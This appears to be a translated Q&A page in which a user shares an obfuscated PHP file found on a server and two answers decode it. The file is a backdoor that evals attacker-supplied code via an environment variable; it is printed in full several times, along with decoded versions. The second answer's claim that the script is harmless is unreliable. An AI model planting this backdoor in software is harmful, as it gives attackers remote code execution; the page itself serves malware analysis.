在服务器上找到可疑文件

时间:2014-01-02 19:41:21

标签: eval virus

我在服务器上发现了一个可疑文件,我正在尝试解码并找出它的用途。

代码如下,有关如何解码的任何提示。

<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} ?>

谢谢,

艾伦。

2 个答案:

答案 0 :(得分:3)

您正在寻找的php中的功能似乎是base64_decodeurldecode.的组合,例如:

urldecode("\x6d\x79s\x74r\x31s\x311\x30");

给出"mystr1s110"

也是eval语句base64_decodes中的字符串的一部分:

function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}

这些编码字符串是前面定义的所有引用变量,例如\x6d\x79s\x74r\x31s\x311\x30 url-decodes to mystr1s110

这对我来说非常讨厌。虽然我不是安全专家。我只是php -a并找出解码的块是什么,然后从那里重构代码。

旁注。你把它从服务器上取下来了吧?

编辑:

对此有点好奇。完成解码后,我得到了这个:

<?php 

if(!function_exists("myFunction2")){

class myClass {
    static $myVar1="SFRUUF9IVFRQRA=="; 
    static $myVar2=“base64_decode”; 
}

function myFunction1($myArg)
{
    ${$myVar4}=myClass::$myVar2;  // myClass::$myVar2 is just "base64_decode"
    return $myVar4( myClass::${$myArg} );  // reuturning base64_decode of the argument
}

function myFunction2($myArg2) 
{
    return myClass::${$myVar3} 
} 

$myFinalVar=@getenv(myFunction1('myVar1'));   //just gets env variable of base64 decode of myVar1

if($myFinalVar) {
    @eval($myFinalVar);  //executes

} 

?>

在我看来它是一个旨在在另一台服务器上执行脚本的脚本。 (也就是说,他们只需要在网址中点击网址,然后执行。SFRUUF9IVFRQRA==会解码为HTTP_HTTPD,这样他们就可以点击http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php并在服务器上运行他们想要的任何内容

答案 1 :(得分:0)

据我所知,这不是一个有害的剧本,事实上,它没有任何用处。

以下是我的评论的基础 -

要进行解码,您只需将十六进制字符串作为参数放入print_r()。

print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");

完整的解码代码是:

<?php 
if(!function_exists("mystr1s45")){
    class mystr1s21 { 
        static $mystr1s279="SFRUUF9IVFRQRA==";
        static $mystr1s178="base64_decode"; 
    }
    eval(
        eval(
            function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
                ${mystr1s110}=mystr1s21::${mystr1s178};
                return ${mystr1s110}( mystr1s21::${${mystr1s99}} );
            }
        );
        eval(
            function mystr1s45($mystr1s66) {
                return mystr1s21::${${mystr1s66}};
            }
        );
    );
}
$mystr1s2235=@getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
    @eval($mystr1s2235);
}
?>

函数mystr1s78将返回'HTTP_HTTPD'。这将用作环境变量,以使用getenv获取其值。

如果运行已解码的代码,您将在函数mystr1s78的定义附近面临“解析错误”。这是因为,eval期望字符串和字符串必须是有效的代码语句(而不是表达式)。

Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('

据我所知,默认情况下,HTTP_HTTPD不是由apache或任何网络服务器设置的环境变量,即使它是具有某个值的变量,将其传递给eval也不会做任何事情。

要确认,您可以按如下方式设置环境变量HTTP_HTTPD:

<?php 
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} 

?>

如果您认为这是恶意的并且可能会损害系统,请告诉我们。

相关问题
最新问题